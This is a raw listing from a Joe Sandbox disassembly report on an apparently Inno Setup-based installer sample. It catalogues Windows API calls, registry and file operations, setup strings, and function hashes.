                                                                                                      • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                      • API String ID: 3355656108-1243109208
                                                                                                      • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                                      • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                                      • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                                      • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                                        • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                                      • , xrefs: 004545B1
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                                      • RegCreateKeyEx, xrefs: 004545C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFormatMessageQueryValue
                                                                                                      • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                      • API String ID: 2481121983-1280779767
                                                                                                      • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                      • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                                      • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                      • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                                      APIs
                                                                                                        • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                        • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                                      • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                                        • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                      • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                      • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                      • API String ID: 1549857992-2312673372
                                                                                                      • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                      • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                                      • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                      • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                                      • API String ID: 4190037839-2312295185
                                                                                                      • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                      • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                                      • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                      • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 004629FC
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                      • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                      • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                                      • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                      • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 0042F194
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                      • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                      • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                                      • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                      • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                                      APIs
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02153858,00000000), ref: 00458C79
                                                                                                      • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                                      • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                                      • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                      • String ID: CreateEvent$TransactNamedPipe
                                                                                                      • API String ID: 2182916169-3012584893
                                                                                                      • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                      • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                                      • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                      • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
APIs
• GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
• GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
• LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: AddressErrorHandleLastLoadModuleProcType
• String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
• API String ID: 1914119943-2711329623
APIs
• RectVisible.GDI32(?,?), ref: 00416E13
• SaveDC.GDI32(?), ref: 00416E27
• IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
• RestoreDC.GDI32(?,?), ref: 00416E65
• CreateSolidBrush.GDI32(00000000), ref: 00416EE5
• FrameRect.USER32(?,?,?), ref: 00416F18
• DeleteObject.GDI32(?), ref: 00416F22
• CreateSolidBrush.GDI32(00000000), ref: 00416F32
• FrameRect.USER32(?,?,?), ref: 00416F65
• DeleteObject.GDI32(?), ref: 00416F6F
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
• String ID:
• API String ID: 375863564-0
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
• GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
• GetFileType.KERNEL32(?,000000F5), ref: 00404C11
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
• GetLastError.KERNEL32(000000F5), ref: 00404C46
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
APIs
• GetSystemMenu.USER32(00000000,00000000), ref: 00422233
• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
• DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
• DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
• DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
• DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
• EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Menu$Delete$EnableItem$System
• String ID:
• API String ID: 3985193851-0
APIs
• FreeLibrary.KERNEL32(10000000), ref: 00481A11
• FreeLibrary.KERNEL32(00000000), ref: 00481A25
• SendNotifyMessageA.USER32(00010434,00000496,00002710,00000000), ref: 00481A97
Strings
• Deinitializing Setup., xrefs: 00481872
• Restarting Windows., xrefs: 00481A72
• DeinitializeSetup, xrefs: 0048190D
• Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
• GetCustomSetupExitCode, xrefs: 004818B1
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: FreeLibrary$MessageNotifySend
• String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
• API String ID: 3817813901-1884538726
APIs
• SHGetMalloc.SHELL32(?), ref: 004616C7
• GetActiveWindow.USER32 ref: 0046172B
• CoInitialize.OLE32(00000000), ref: 0046173F
• SHBrowseForFolder.SHELL32(?), ref: 00461756
• CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
• SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
• SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
• String ID: A
• API String ID: 2684663990-3554254475
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
  • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
• RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
• String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
• API String ID: 884541143-1710247218
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                                      • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                      • API String ID: 190572456-3516654456
                                                                                                      • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                      • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                                      • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                      • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                                      APIs
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                                      • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                                      • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
